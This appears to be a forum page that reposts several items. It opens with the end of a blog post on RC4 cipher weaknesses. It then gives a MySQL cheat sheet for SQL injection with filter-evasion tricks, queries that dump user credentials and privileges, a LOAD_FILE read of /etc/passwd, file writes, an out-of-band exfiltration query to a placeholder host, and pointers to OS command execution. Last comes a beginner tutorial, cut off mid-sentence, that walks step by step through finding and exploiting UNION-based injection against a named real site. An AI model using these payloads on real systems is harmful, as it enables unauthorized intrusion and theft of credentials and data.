which was proposed as a band-aid replacement for WEP. TKIP was designed to support legacy WEP-capable devices that had internal RC4 hardware, but weren't powerful enough to handle AES. It made a bunch of positive changes to WEP (including adding a larger IV to prevent keystream reuse), but the most notable change was a new custom hash function that creates a per-packet key from an IV and secret key. As a hash function, the TKIP hash kind of stinks. For one thing, it can be inverted given only about 10 per-packet keys and about 2^32 computation (these days, a few minutes on a TI calculator). However, this isn't as big of a deal as it sounds: pre-image resistance isn't precisely a goal of the TKIP hash, since those per-packet keys themselves should themselves be hard to obtain. Nonetheless, I wouldn't recommend that you mess around with it. If you must use RC4, try a proper hash function. Or better yet, don't use RC4 at all. Distinguishers RC4 is just a PRG, and a PRG is secure if its output is indistinguishable from a stream of truly random bits -- to a 'reasonable' adversary who doesn't know the key.** Hence a great deal of RC4 research focuses on the quality of the cipher's PRG. So is RC4 a good pseudo-random generator? Meh. Given a mere 1.5GB of keystream data, Fluhrer and McGrew presented an algorithm that distinguishes RC4 from random. I already mentioned Mantin and Shamir who cranked this down to about 256 bytes (over various unknown, unrelated keys) by looking at the second output byte. Finally, Mantin noticed the presence of repeating patterns in RC4, which aren't simply dependent on the first few bytes of output, and can be used to distinguish RC4 given about 64MB of keystream. There are, of course, other distinguishing attacks. But does it matter? Well, sort of. Indistinguishability is an important characteristic of a pseudo-random generator. If we have it, then the security argument for RC4 as a stream cipher is very simple: to an adversary who can't distinguish the PRG, RC4 encryption is indistinguishable from a one-time pad. Unfortunately the converse isn't true. Just because RC4 output is distinguishable from random doesn't mean that there's a practical attack on the cipher. These results are important mostly because they illustrate the fundamental wonkiness of RC4, wonkiness that doesn't go away just because you drop the first 3,072 bytes. But they don't exactly give us a practical opening into the cipher itself. Yet. Ok, none of this was very helpful. I just want to know: can I use RC4? Great question. Look, the upshot is that RC4, if used as recommended (with hashed IVs and/or dropped output and MACs), is perfectly sufficient for securely encrypting messages. Today. The problem is, we never know what the future will bring. My advice? Don't run with scissors. You can lose an eye that way. Notes: * You might argue that RC4 implementations shouldn't use padding in the first place, since (unlike CBC mode encryption with a block cipher) messages don't need to be padded to a multiple of a block size. This is true -- however, I would note that 'padding oracle'-style attacks needn't rely specifically on padding. Padding is just one type of encoding that can leak useful information if used incorrectly. See Jager and Somorovsky's recent result on XML encryption for a great example of this. ** By reasonable, of course, we mean 'computationally limited'. This rules out attacks that require an unrealistically long time, quantum computing, or ESP. Posted by Matthew Green at 8:11 AM Sursa: A Few Thoughts on Cryptographic Engineering: What's the deal with RC4?

[h=5]Usefull Stuff For SQLI[/h] A handful of useful functions, syntaxes and queries for MySQL. Also knows as a MySQL Cheat Sheet. [h=4]chernabog[/h] Version: SELECT VERSION() SELECT @@version SELECT @@version_comment SELECT @@version_compile_machine SELECT @@version_compile_os Directories: SELECT @@basedir SELECT @@tmpdir SELECT @@datadir Users: SELECT USER() SELECT SYSTEM_USER() SELECT SESSION_USER() SELECT CURRENT_USER() Current Database: SELECT DATABASE() Concatenation: SELECT CONCAT('foo','.','bar'); #Returns: foo.bar SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world! Multi-Concat: #Stacks the row "foo" from the table "bar" together, using the separator "<br />". #Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT. #The 1024 byte limit is stored in the @@group_concat_max_len variable. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar Better-Concat: #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(). #Which therefor allows you to concat strings together up to the @@max_allowed_packet size, #instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to #1048576 bytes, instead of @@group_concat_max_len's 1024. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1))) Change Collation: SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation. SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8. Wildcards in SELECT(s): SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test". SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test". Regular Expression in SELECT(s): #Returns all columns matching the regular expression. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*' SELECT Without Dublicates: SELECT DISTINCT foo FROM bar Counting Columns: SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar". Get Amount of MySQL Users: SELECT COUNT(user) FROM mysql.user Get MySQL Users: SELECT user FROM mysql.user Get MySQL User Privileges: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges Get MySQL User Privileges on Different Databases: SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges Get MySQL User Privileges on Different Columns: SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges Get MySQL User Credentials & Privileges: SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv, Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv, File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv, Repl_client_priv) FROM mysql.user Get MySQL DBA Accounts: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER' SELECT host,user FROM mysql.user WHERE Super_priv='Y' Get Databases: SELECT schema_name FROM information_schema.schemata SELECT DISTINCT db FROM mysql.db SELECT DISTINCT table_schema FROM information_schema.columns SELECT DISTINCT table_schema FROM information_schema.tables Get Databases & Tables: SELECT table_schema,table_name FROM information_schema.tables SELECT DISTINCT table_schema,table_name FROM information_schema.columns Get Databases, Tables & Columns: SELECT table_schema,table_name,column_name FROM information_schema.columns SELECT A Certain Row: SELECT foo FROM bar LIMIT 0,1; #Returns row 0. SELECT foo FROM bar LIMIT 1,1; #Returns row 1. ... SELECT foo FROM bar LIMIT N,1; #Returns row N. Benchmark (Heavy Query): #Performs an MD5 calculation of "1" for 10000 times. SELECT BENCHMARK(10000,MD5(1)) Sleep: #Works only in MySQL 5 and above. #Sleeps for 5 seconds, returns 0 on success. SELECT SLEEP(5) Conversion (Casting): SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1 SELECT CAST('65' AS CHAR); #Returns: A Substring: SELECT SUBSTR('foobar',1,3); #Returns: foo Hexadecimal Evasion: SELECT 0x41424344; #Returns: ABCD SELECT 0x2E; #Returns: . SELECT 0x3A; #Returns: : ASCII to Number: SELECT ASCII('A'); #Returns: 65 Number to ASCII: SELECT CHAR(65); #Returns: A SELECT CHAR(89); #Returns: Y SELECT CHAR(116,101,115,116); #Returns: test If Statement: #Returns 1 if the database is running MySQL 5. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0); #Returns 1 if the database is running MySQL 4. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0); Case Statement: #Returns 1 if the database is running MySQL 5. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END #Returns 1 if the database is running MySQL 4. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END Read File(s): #Requires you to have the File_priv in mysql.user. On error this statement will return NULL. SELECT LOAD_FILE('/etc/passwd') Write File(s): #You must use quotes on the filename! SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt' SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World') Logical Operator(s): AND, &&; #The AND operator have && as an alternative syntax. OR, ||; #The OR operator have || as an alternative syntax. NOT, !; #The NOT operator have ! as an alternative syntax. XOR; #The XOR operator got no alternative syntax. Fuzzy Code Comment: #Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/ Comments: SELECT foo, bar FROM foo.bar-- Single line comment SELECT foo, bar FROM foo.bar/* Multi line comment */ SELECT foo, bar FROM foo.bar# Single line comment SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-byte. It do not work together with PHP though. A few evasions/methods to use between your MySQL statements: CR (%0D); #Carrier Return. LF (%0A); #Line Feed. Tab (%09); #The Tab-key. Space (%20); #Most commonly used. You know what a space is. Multiline Comment (/**/); #Well, as the name says. Fuzzy Comment (/*!); #Be sure to end your query with (*/) Parenthesis, ( and ); #Can also be used as separators when used right. Parenthesis instead of space: #As said two lines above, the use of parenthesis can be used as a separator. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2)) Auto-Casting to Right Collation: SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation. DNS Requests (OOB (Out-Of-Band)): #For more information check this. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_as.txt’ Command Execution: #If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA. #It can be done if you're able to upload a shared object into /usr/lib. #The file extension is .so, and it must contain an "User Defined Function", UDF. #Get raptor_udf.c, it's the source-code for just that feature. #Remember to compile it for the right CPU Architecture. #The CPU architecture can be resolved by this query: SELECT @@version_machine; <blockquote>A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.</blockquote> Version: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5 SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4 Running as root: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1 Got File_priv: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Got Super_priv (Are we DBA): SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Can MySQL Sleep: #This query will return True and should take above 1 second to execute. If it's a success. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1 Can MySQL Benchmark: SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1 Are we on *NIX: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47 Are we on Windows: SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1 Do a certain column exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0 Do a certain table exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 Do a certain database exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0 from:h.ackack(dot)net Sursa: Usefull Stuff For SQLI

Da... Ce sa faca omu la 06:30 AM cand nu are somn? Postez de azi-noapte

SQL Injection (detalied) Tutorial created by ande for www.evilzone.org Written December 27, 2009. Updated May 29, 2011. In this tutorial 1.0 What is SQL? 1.1 Types of SQL or SQL engines 1.2 Understanding the SQL structure 1.3 Finding vulnerabilities 1.4 Exploiting vulnerabilities 1.5 Securing vulnerabilities 1.0 What is SQL? SQL stands for Structured Query Language. It is a way to store, modify and update data secure, fast and reliable. SQL is mostly used for web sites but can however be used for almost any application and or service which is in need of storing, editing and or updating data in a good and structured way. In this tutorial I will be using PHP as script language for examples. PHP is a web script engine. Its the most widely used one, its the best one and its the one you are most likely to encounter in real life scenarios. Now, you might think; But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts?(ASP, ASP.NET, Java, Perl, CGI, [...]) No, you don't. The concept remains the same. However, to truly understand SQL injection on various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP. Additionally I will be using MySQL as the SQL engine in examples. Theoretically SQL can be used by any script engine as it is basically just a application listening on a port on a server waiting for commands/instructions. The only requirement is the ability to use TCP/IP protocol. However some script engines like PHP and ASP(.net) got pre-made classes and functions for some of the most common SQL engines. Making it a whole lot easier to interact with the SQL server. In order to run PHP scripts(at least in a browser) you are going to need a PHP supported web server. It is not required to write a single line of code or install anything on your computer to complete this tutorial. But its a good idea to experiment with all of the elements in this tutorial. PHP, MySQL and web server(I recommend apache). Learn more about PHP: http://php.net | PHP - Wikipedia, the free encyclopedia Learn more about SQL: SQL - Wikipedia, the free encyclopedia Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia Learn more about Apache: Apache HTTP Server - Wikipedia, the free encyclopedia PS. If you want a really quick way of installing all of the elements above, install WAMP for Windows. Its a all-in-one Apache, MySQL and PHP system for Windows. Alternatively, here is a guide to setup Apache + PHP, but no MySQL: Starting PHP scripting - Setting up a PHP environment In this case you will have to install MySQL for yourself, which can be a bit hard if you are a beginner. 1.1 Types of SQL or SQL engines There are many different variations of SQL. Most of the coming from different companies, some are free some are not. Some are open source, and some are not. Its like everything else really. Some of the different SQL engines are: Oracle MSSQL MySQL PostgreSQL I personally use MySQL because its free and works well with Apache and whatnot. It also got a good syntax. It is also the most used engine so its what you will most likely encounter when doing injections. All SQL in this tutorial will be MySQL. Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia 1.2 Understanding the SQL structure The structure of SQL is divided into; Servers, databases, tables, columns and rows. A SQL server is a software running on a computer waiting for commands from console or over the internet(or localhost/lan). A SQL server consists of databases and can contain as many databases as you want. A database consists of tables. A table consists of columns and rows. Here at Evilzone we use a local SQL server. One of our databases(A SMF forum database) contains these tables: Quote smf_attachments smf_ban_groups smf_ban_items smf_boards smf_board_permissions smf_calendar smf_calendar_holidays smf_categories smf_collapsed_categories smf_log_actions smf_log_activity smf_log_banned smf_log_boards smf_log_errors smf_log_floodcontrol smf_log_karma smf_log_mark_read smf_log_notify smf_log_online smf_log_polls smf_log_search_messages smf_log_search_results smf_log_search_subjects smf_log_search_topics smf_log_topics smf_membergroups smf_members smf_messages smf_message_icons smf_moderators smf_package_servers smf_permissions smf_personal_messages smf_pm_recipients smf_polls smf_poll_choices smf_sessions smf_settings smf_smileys smf_themes smf_topics The table smf_members will most likely contain information about all the members on the forum. A few of the columns smf_members contains: Quote ID_MEMBER memberName dateRegistered posts realName ICQ AIM YIM MSN avatar karma Now a row is one line with all these columns. Ill try to show you with a little ASCII awesomeness here. This entire thing is a table: ______________________________________________________ |____ID_____|___Name_____|____Pass___|______Email_______| |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___| |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___| |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___| |_____3_____|___abceqfg__ |___abcgefg__|__abc@gmail.com___| |_____4_____|___affdeqfg__ |___abcgefg__|__abc@gmail.com___| |_____5_____|___abhhefg__ |___abcgefg__|__abc@gmail.com___| |_____6_____|___abaaefg__ |___abcgefg__|__abc@gmail.com___| |___________|____________|___________|_________________| In this table the fields ID, Name, Pass and Email are columns. The items downwards are rows. Row1: |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___| Row2: |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___| Row3: |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___| And so on... Thats pretty much it really. Takes a few brain fluxuations before you will memorize this on your own. Remember: Server(s)->Databases->Tables->Columns and rows 1.3 Finding vulnerabilities Before moving on now, it is a GOOD idea for you to learn the basics about both PHP and MySQL(at least look up some code), it is not required to be able to perform SQL injections, however. You will find it much easier to perform more advance injections later on(And you will actually understand what the fuck is going on behind the scenes!). I will also do this tutorial by showing the server side code in PHP and MySQL. Okay, our target! http://evilzone.org! Lets now try to find a page where our target(http://evilzone.org) uses SQL with user inputs. So you are browsing around on the page. You find these links: Evilzone - Hacking and Security Community - Index (shows an article) Evilzone - Hacking and Security Community - Index (shows a contact form) http://evilzone.org/contact.php?do=submit (you come to this link when you click send on contact form) Okay, the most common use of SQL is when looking for things like articles, posts, threads, comments, user information, product information and so on. The link index.php?page=contact is probably not SQL based because its not normal to load entire pages from SQL(can be done tho), this link is more likely to be vulnerable to RFI or LFI. But you should still try it nonetheless. The link index.php?do=submit might contain SQL however, then it is most likely a POST SQL injection, which I wont cover in this tutorial. Its very normal to save this kind of information in SQL. Now! The link index.php?id=17! This link almost certainly uses SQL. This is a very common thing to use SQL for. The SQL query for this case would look a lot like this: Code: [select] SELECT * FROM articles WHERE id='17' What this does is, it asks the SQL server for all data(*) where the article's ID = 17. Lets say the article table got a ID, subject and text column. The SQL server will then return the id, subject and text data from the table 'articles' where ID is equal to 17. This is the normal way. This is what it does if a normal user browses the page. However, what if we... Lets try to add a ' to the end of the link so the link becomes http://evilzone.org/index.php?id=17' Now the SQL query would look something like this: Code: [select] SELECT * FROM articles WHERE id='17'' This wont work very well, two 's? The SQL server doesn't understand this so it will now return an error message instead of the data of the article it normally would. So the page will now output something like this(where the article used to be): Quote You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Error no:xxxx Now, if you are not getting such an error message(any error message is good, doesn't need to be 100% like the one above.), but you are getting a blank page(either in form of a totally white blank page or a page with no content at the places where there used to be content without the error prefix(')). No worries. It can still be vulnerable. In a lot of cases, the page wont return any error messages, but there can still be an error behind the scenes. Which means its still vulnerable. Additionally, the ' character is not always the right one to use or is enough to cause an error. Further testing is required to determine if the target is vulnerable. On top of that. Sometimes, instead of displaying an error message or a blank page, it can do things like redirecting to the main page or something similar. If you are getting an error message you can jump to the next chapter(1.4 Exploiting vulnerabilities). I do however, recommend reading this chapter done tho. Up to you. You should know what to do when no error message appears To determine if a target is vulnerable when it does not output any error message from just adding a ' to the link you need to first try some other characters, if still no error message you need to try a few other techniques. Continue reading. Other error prefixes( like the ' ) are: Quote " \ /* '/* "/* '-- "-- '; "; -- ; If none of the above characters create an error, I highly doubt you will ever get one. Lets move on to some other techniques. If you are getting a blank page(either a totally white one or a page with no content where it used to be content without any error prefix). We need to try to "join" the query instead of creating an error. You can do this in a few different ways. Here are the ones I recommend: Quote +order+by+99999 +or+1=2 +and+1=2 Don't mind the + sign, its the equivalent to a space, but if you put a space in your URL, it will become %20, which is a lot harder to read than +. Now, you use the 3 query injections like this: Using +order+by+xThe whole point here is to see if we can order the result by a something. First, take your URL: index.php?id=17 Then just try adding +order+by+1 If the page now returns normally, try adding +order+by+99999 If the page now does not load normally, you might have vulnerable page. Explanation: +order+by+1 will order the returning results from the MySQL server by column 1. The column 1 must exist because a table cannot have 0 columns. But the +order+by+99999 will try to order the results by column nr 99999. This column cannot possibly exist, because that way over the maximum possible columns in a table. Therefor, this should create an error(or return nothing). Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +order+by+x in combination with adding ' and " before +order+by+x Examples: '+order+by+1 "+order+by+1/* '+order+by+1'-- +order+by+1/* [...] Using +or+x=xThe whole point here is to see if we can trick the SQL server into making a question true no matter what. First, take your URL: index.php?id=17 then change the number(or whatever your URL have as value) into something completely different from its original value. Because this is a number, we will change it into -1. Most likely the SQL server does not got a article with the ID -1 Our URL now looks like this: index.php?id=-1 Then just try adding +or+1=1 If the page now returns normally, try adding +or+1=2 If the page now does not load normally, you might have vulnerable page. Explanation: +or+1=1 will always return true. In this example with the query I showed you above this will make the entire query something like this: Code: [select] SELECT * FROM articles WHERE id='-1' or 1=1 So, the SQL server will return all articles where 1=1! This also means you will most likely not the get same article you got the first time, but rather the first article in the database. Or you will get all articles on the same page. nonetheless, we got ourselfs a vulnerable page! Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +or+1=1 in combination with adding ' and " before +or+1=1. Also try 'a'='a and "a"="a instead of 1=1 (yes without the last ' and ") Examples: '+or+1=1 '+or+'a'='a +or+1=1/* [...] Using +and+x=xThe whole point here is to set another condition in the query to see if we can affect the query at all. First, take your URL: index.php?id=17 Then just try adding +and+1=1 If the page now returns normally, try adding +and+1=2 If the page now does not load normally, you might have vulnerable page. Explanation: +and+1=1 will set another requirement in the query. The query will become like this: Code: [select] SELECT * FROM articles WHERE id='17' and 1=1 But when you put +and+1=2 the query becomes like this: Code: [select] SELECT * FROM articles WHERE id='17' and 1=2 This will of course never be true, because 1 will never be equal to 2. So, if you are able to set your own requirements in the query, we can also do an information retrieval injection, which in the end is what SQL injection is all about. Getting information you are not supposed to. Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +and+x=x in combination with adding ' and " before +and+x=x. Also try 'a'='a and "a"="a instead of 1=1 (yes without the last ' and ") Examples: '+and+1=1 '+and+1=1/* "+and+'a'='a '+and+"a"="a [...] If you after using at least one of the above techniques got no indications that the page could be vulnerable. It probably is not vulnerable. Find a new URL! PS: If you actually learn MySQL syntaxes and SQL logic you wont have to do as much trial and error as I have described in the techniques above. You will understand how/why the different prefixes does and when they are necessary/required/possible. 1.4 Exploiting vulnerabilities Once you have found a vulnerable link it is pretty straight forward. (Well, can be at least. Your injection could be blind and that will make your life a lot harder. Blind injections are NOT covered in this tutorial.) Just a quick description of blind SQL injection(Credits to owasp.org) Quote Overview When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements. Back to our vulnerable link. It is a good idea to try to visualize what the SQL query looks like. In this case it is pretty easy. But in more advance injections this really helps out. So again, the query looks like this: Code: [select] SELECT * FROM articles WHERE id='ID'<-INJECTION GOES HERE The first thing we need to do is find out how many column it is in the table 'articles'. This is because we are going to use the UNION ALL SELECT command. What this UNION ALL SELECT command does is that it allows you to SELECT something in the database two times within the same query, it will then return the data of both the SELECT commands as if it was one query. So.. In this case we know that the table got 3 columns(ID, subject, text). If we don't know this, there are two things you can do. You can do it by using the ORDER BY command or you can just try it out to your query works. However, I would normally go for the ORDER BY command as this does not create lots of nasty logs and its faster if its more than 5 columns or so. The ORDER BY command does exactly what it sounds like. It orders things alphabetically, numeric or by date/time. It can order by name or offset of a column. That means you can do ORDER BY ID or ORDER BY 1, this will be the same if the column ID is the first column. That again means that we can find out how many columns the table got by trying to order by offsets until we get a error or blank page starting at something like 5. So here we go: TIP: Use + instead of space, makes it much cleaner. Evilzone - Hacking and Security Community - Index : Returns blank page Evilzone - Hacking and Security Community - Index : Returns normal page Evilzone - Hacking and Security Community - Index : Returns blank page Evilzone - Hacking and Security Community - Index : Returns normal page Okay, so 4 is to high and 2 is to low because 3 obviously worked. Now we know the table got 3 columns! Now we are almost ready to start getting some juicy data. But I have kinda cheated for you guys. Because normally we don't know what the names of the columns are, I just said they are named ID, subject and text. So we need to look this up. Before we can look up what the column names are, we need to find out what version of MySQL the server are running. Newest one are 5.*** and the one you MIGHT come by is 4.*** We can use the UNION ALL SELECT command already, however its pointless for data extraction without the column names(actually its not even possible). But we can get the version without the names. This is what you need to do now: Evilzone - Hacking and Security Community - Index There we go, now we used the UNION ALL SELECT command. We do 1,2,3 because it is 3 columns. If it was 5 you will have to do 1,2,3,4,5 and so on... The page now should/may output "2" as subject and "3" as the article text. 1 is should not be there because the ID is probably not printed to the page. If the page outputs "2" and "3", then great! Skip past the next text block. If not read this; The UNION ALL SELECT doesn't replace the first SELECT so in some cases(depending on the PHP code) we have to cause an select that will select nothing first. What we can do then is put something like 99999 instead of 17. This will return nothing because article NR 99999 doesn't exist(just make sure 99999 really does not exist ). But the union all select will return 1,2,3 and this will be printed to the page instead. Our page now outputs "2" as subject and "3" as article text. We can now find out what version they are running. This is how you do that: Evilzone - Hacking and Security Community - Index Now the text("3") will be replaced with the information about what version they are running. If the version query returns as 5.*** then you can skip the next block of text, if it returns 4.*** read this; In the MySQL version V4 they did not have the database called 'information_schema' which in V5 contains all information about all tables and columns(names, ids and more). That means, in V4 it is impossible to find out the table and column names, the only way to then get any data out is by guessing the table/column names which is time consuming and may create a lot of logs... If you wish to continue the injection, you should read through the rest and then understand how to guess the names. There are programs to brute force the table and column names. ------------------------------------------- Okay, before we continue now. I just want to get something of my heart. If you are getting errors from even trying to UNION ALL SELECT anything. And are either getting error messages that says something like "wrong type" or something like that, or are just getting blank page/redirection: If the table of the first SELECT command in a query you are trying to UNION ALL SELECT is built in such a way that, lets say the first two columns are set to be numbers, and the last one is set to be a text value(I am using 3 columns because thats what we are dealing with here). You have to follow that pattern in the UNION ALL SELECT command too. So if the first SELECT is 2x columns of type number and then a text column, your UNION ALL SELECT command have to be alike(UNION ALL SELECT 1,2,'text'). Which means for us that we cannot use the 2 number in the query to get text information from the SQL server. But we will continue this tutorial as if the columns we are using wont create any errors. We can now "ask" the database 'information_schema' for the column names. The 'information_schema' database contains a table called 'tables' and a table called 'columns'. The table 'tables' inside the database information_schema contains information about all the tables within all the databases on the server. So to find table names you can "ask" the table 'tables' in the database 'information_schema'. The table 'columns' in the database 'information_schema' contains information about all the columns inside all the tables in all the databases on the server. So to get column names you can "ask" the table 'columns' in the database 'information_schema'. Note: The table 'columns' in 'information_schema' also contains table names, therefore we can get both column and table names with one query if we want to. But before we can ask the 'column' table for column names we need to know what table we want to extract information from. You do that by asking the table 'tables' in the database 'information_schema' for table names. But when doing this without any more requirements than just "give me everything" to the SQL server, it will return ALL table names in the entire server. And that can be a lot on large servers. So.. We need to specify our question to the table a bit better. To get all table names in a specific database you do this: Code: [select] Evilzone - Hacking and Security Community - Index' This will ask the table 'tables' in 'information_schema' for all table names where the database name is 'DatabaseName'. Remember, databases consists tables, so each table will always have a owner database. To ask it for all table names in the current database, the one already used by the original query you do this: Code: [select] Evilzone - Hacking and Security Community - Index to code tag them because they fucked up the formating) The variable database() represents the database in use by the first SELECT command in the query. TIP: schema means database Again, before we continue now. I have to make an important note. If your injections are failing when you have 's or "s in them, you have to convert your arguments to HEX. A lot of things in MySQL can be represented at HEX instead. When you want to represent things as HEX you simply remove the 's or "s and put 0xHEX_NMBERS instead. The 0x will indicate to the MySQL server that the value is a HEX string. Here is the above link that contained 's in HEX version: Code: [select] Evilzone - Hacking and Security Community - Index An excellent online text to HEX converter: Convert String To Hexadecimal Online Continuing... Now, where the number "3" or where originally the article text was it should now be a table name. Lets say this database contains the tables: Quote articles users log Then you should see 'articles' because it is the first table. Okay, so we know the database got a table called 'articles', lets check that one out. Now we need to get the column names for the table 'articles'. To get the column names of a table you do this: Code: [select] Evilzone - Hacking and Security Community - Index' Note the 's in the query, remember what I wrote about 's and HEX. Okay, lets break it down a bit. Now we have used the UNION ALL SELECT command and we asked the database 'information_schema' if it got a table called 'columns', and it did, so we asked the table 'columns' if it could give us all the names of the columns in the table called 'articles' BTW, the concat() will return everything inside it as a merged value. Example: concat('h', 'e', 'll', 'o') will return hello. Concat() is not needed in this query but its a good idea to learn how to use it, as you will need it later. The place where the number "3" used to be or the place where the article text is when using the page normally should now have a name in it. In this case it should have the value 'ID'. This is because the column name 'ID' is the first column in the table 'articles'. So now we know one of the column names in the table. To get the rest we have to use the LIMIT command. The LIMIT command will return a limited/selected amount of rows from a table. Example: We got a table with only one column, the column is called ID. We got 10 rows: ____ |ID_| |_1_| |_2_| |_3_| |_4_| |_5_| |_6_| |_7_| |_8_| |_9_| |_10| If we do: Code: [select] SELECT * FROM TheTableAbove LIMIT 0,5 It will return the row 1 to 5 If we do: Code: [select] SELECT * FROM TheTableAbove LIMIT 5,5 It will return the row 5 to 10 Now, back to getting the column names. Lets try to get column name NR 2, NR 1 is 'ID', we got that from the previous query. Code: [select] Evilzone - Hacking and Security Community - Index This should return the name 'subject'. This is because the columns 'subject' is columns NR 2. So by limiting the result from result 1(0 is the first) and then give us the next 1 result(s) we get 'subject'. To get the last column name we limit it 2,1. Code: [select] Evilzone - Hacking and Security Community - Index This should return 